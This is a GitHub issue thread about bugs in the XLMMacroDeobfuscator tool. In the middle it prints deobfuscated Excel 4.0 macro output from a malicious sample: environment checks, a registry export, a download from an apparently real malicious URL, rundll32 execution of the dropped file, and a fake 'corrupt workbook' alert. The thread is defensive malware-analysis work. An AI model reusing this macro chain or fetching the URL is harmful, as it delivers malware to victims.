Closed Maijin closed 4 years ago
DissectMalware
commented
4 years ago I will check these samples, shortly. Thanks for sharing.
I think if you can upload them on VT, upload them there and then give me the hashes. Or upload them on any.run or similar sites and give me the links. If non of these works, and you want to keep them secret, then upload them on a cloud service like google drive and send me the links via DM on Twitter (https://twitter.com/DissectMalware).
doomedraven
commented
4 years ago Or to cape so we can test update too 😉
El jue., 21 may. 2020 21:07, Malwrologist notifications@github.com escribió:
I will check these samples, shortly. Thanks for sharing.
I think if you can upload them on VT, upload them there and then give me the hashes. Or upload them on any.run or similar sites and give me the links.
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/DissectMalware/XLMMacroDeobfuscator/issues/33#issuecomment-632288396, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAOFH3Z5TRU3MNGD63QB6RTRSV3XTANCNFSM4NHANU3A .
Maijin
commented
4 years ago Oh it's not about getting it secrets hehe, just not sure about creating zillions issues ;)
DissectMalware
commented
4 years ago I can think of two possible ways: 1. I can keep this issue open indefinitely, post all of the instances that xlmdeobfuscator has a problem with in this issue. or 2. contact me on Twitter (send the hashes through DM, ...)
dryancd
commented
4 years ago I'll take a look at this too
DissectMalware
commented
4 years ago I fixed both of the issues. Please check.
DissectMalware
commented
4 years ago I forgot that I said one option to communicate interesting samples to keep this issue open indefinitely. I reopen it so you can choose the option you prefer.
Maijin
commented
4 years ago After update:
7a38e8919652cc138af8d45992dea1792b2e628a363231e80a359efdfd26b8fc is fixed ✅.
The c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0 not fixed:
File: /Users/maijin/Downloads/failing/c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0
[Loading Cells]
Error: MS Excel is not installed, now xlrd2 library will be used insteads
(Use --no-ms-excel switch if you do not have/want to use MS Excel)
auto_open: auto_open->6CPcWBfqzH!$R$1
[Starting Deobfuscation]
CELL:R1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",6CPcWBfqzH!S1)
CELL:R3 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",6CPcWBfqzH!S3)
CELL:R4 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",6CPcWBfqzH!S4)
CELL:R5 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",6CPcWBfqzH!S5)
CELL:R6 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",6CPcWBfqzH!S6)
Process Interruption:
CELL:R7 =FORMULA(F1&F3&F4&F5&F6&F7&F9&F10&F11&F12&F13&F14&F15&F16&F18&F19&F20&F21&F22&F23&F24&F25&F27&F28&F29&F30&F31&F32&F33&F35&F36&F37&F38&F39&F40&F42&F43&F44&F45&F46&F47&F48&F50&F51&F52&F53&F54&F56&F57&F58&F59&F60&F61&F62&F63&F65&F66&F67&F68&F69&F70&F72&F73&F74&F75&F76&F77&F78&F79&F80&F81&F83&F84&F85&F86&F87&F88&F89&F91&F92&F93&F94&F95&F96&F98&F99&F100&F101&F102&F104&F105&F106&F107&F108&F109&F110&F112&F113&F114&F115&F117&F118&F119&F120&F121&F122&F123&F124&F125&F127&F128&F129&F130&F131&F132&F133&F134&F135&F136&F137&F138&F139&F140&F141&F142&F143&F144&F145&F146&F147&F148&F149&F150&F151&F152&F153&F154&F155&F156&F157&F158&F159&F160&F161&F162&F163&F164&F165&F166&F167&F168&F169&F170&F171&F172&F173&F174&F175&F176&F177&F178&F179&F180&F181&F182&F183&F184&F185&F186&F187&F188&F189&F190&F191&F192&F193&F194&F195&F196&F197&F198&F199&F200&F201&F202&F203,S7)
Partial Eval: FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\reg.exe"",""EXPORT HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security c:\users\public\1.reg /y"",0,5)",6CPcWBfqzH!S7)
F182 is not populated, what should be its value?
Enter XLM macro:
Tip: CLOSE() or HALT() to existOh, I understand what happens.
We have some cells that have not been set. The interactive shell is poping up because of that. If you use -n you can get the whole. I fortget to prevent interactive shell from popping up if a cell has never set.
With -n you get
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: C:\Users\user\Downloads\failing.zip\failing\c696f8e0ebb2ce519b343d4dd2770a9e3b0d648defb221275dc249a6ff0ce8f0
[Loading Cells]
Error: MS Excel is not installed, now xlrd2 library will be used insteads
(Use --no-ms-excel switch if you do not have/want to use MS Excel)
auto_open: auto_open->6CPcWBfqzH!$R$1
[Starting Deobfuscation]
CELL:R1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",6CPcWBfqzH!S1)
CELL:R3 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",6CPcWBfqzH!S3)
CELL:R4 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",6CPcWBfqzH!S4)
CELL:R5 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",6CPcWBfqzH!S5)
CELL:R6 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",6CPcWBfqzH!S6)
CELL:R7 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\reg.exe"",""EXPORT HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security c:\users\public\1.reg /y"",0,5)",6CPcWBfqzH!S7)
CELL:R9 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:03"")",6CPcWBfqzH!S9)
CELL:R10 , FullEvaluation , FORMULA("=FOPEN(""c:\users\public\1.reg"")",6CPcWBfqzH!S10)
CELL:R11 , FullEvaluation , FORMULA("=FPOS(R[-1]C, 215)",6CPcWBfqzH!S11)
CELL:R12 , FullEvaluation , FORMULA("=FREAD(R[-2]C, 255)",6CPcWBfqzH!S12)
CELL:R13 , FullEvaluation , FORMULA("=FCLOSE(R[-3]C)",6CPcWBfqzH!S13)
CELL:R14 , FullEvaluation , FORMULA("=FILE.DELETE(""c:\users\public\1.reg"")",6CPcWBfqzH!S14)
CELL:R15 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-3]C)),CLOSE(FALSE),)",6CPcWBfqzH!S15)
CELL:R16 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://amgdorie.online/avdv43g"",""c:\Users\Public\bug75ef.html"",0,0)",6CPcWBfqzH!S16)
CELL:R18 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",6CPcWBfqzH!S18)
CELL:R19 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bug75ef.html,DllRegisterServer"",0,5)",6CPcWBfqzH!S19)
CELL:R20 , FullEvaluation , FORMULA("=CLOSE(FALSE)",6CPcWBfqzH!S20)
CELL:R21 , NotImplemented , WORKBOOK.HIDE("6CPcWBfqzH",TRUE)
CELL:R22 , FullEvaluation , GOTO(S1)
CELL:S1 , FullBranching , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:S1 , End , [TRUE] CLOSE(FALSE)
CELL:S1 , FullEvaluation , [FALSE]
CELL:S3 , FullBranching , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
CELL:S3 , End , [TRUE] CLOSE(FALSE)
CELL:S3 , FullEvaluation , [FALSE]
CELL:S4 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
CELL:S5 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
CELL:S6 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
CELL:S7 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y,0,5)
CELL:S9 , PartialEvaluation , WAIT(NOW()+"00:00:03")
CELL:S10 , PartialEvaluation , FOPEN("c:\users\public\1.reg")
CELL:S11 , PartialEvaluation , FPOS("c:\users\public\1.reg",215)
CELL:S12 , PartialEvaluation , FREAD("c:\users\public\1.reg",255)
CELL:S13 , PartialEvaluation , FCLOSE("c:\users\public\1.reg")
CELL:S14 , NotImplemented , FILE.DELETE("c:\users\public\1.reg")
CELL:S15 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
CELL:S16 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv43g","c:\Users\Public\bug75ef.html",0,0)
CELL:S18 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
CELL:S19 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug75ef.html,DllRegisterServer",0,5)
CELL:S20 , End , CLOSE(FALSE)
[END of Deobfuscation]
time elapsed: 0.4545588493347168The interactive mode is also fixed.
If we encounter a cell that is missing, there are two possibilities: 1. we failed to evaluate a macro previously and as such we couldn't set the cell. 2. the cell has never set before and is empty
If this is the first case, start the interactive shell, otherwise return empty string
Maijin
commented
4 years ago Awesome!
I found couple more samples you may want to check, not sure what's the best way to get them to you, they're unrelated to the previous issues I believe.
One returns a "Error: list index out of range", the other one "F182 is not populated, what should be its value?"
failing,zip.zip
Not sure what's the best way to get those samples to you, not sure if opening issues is.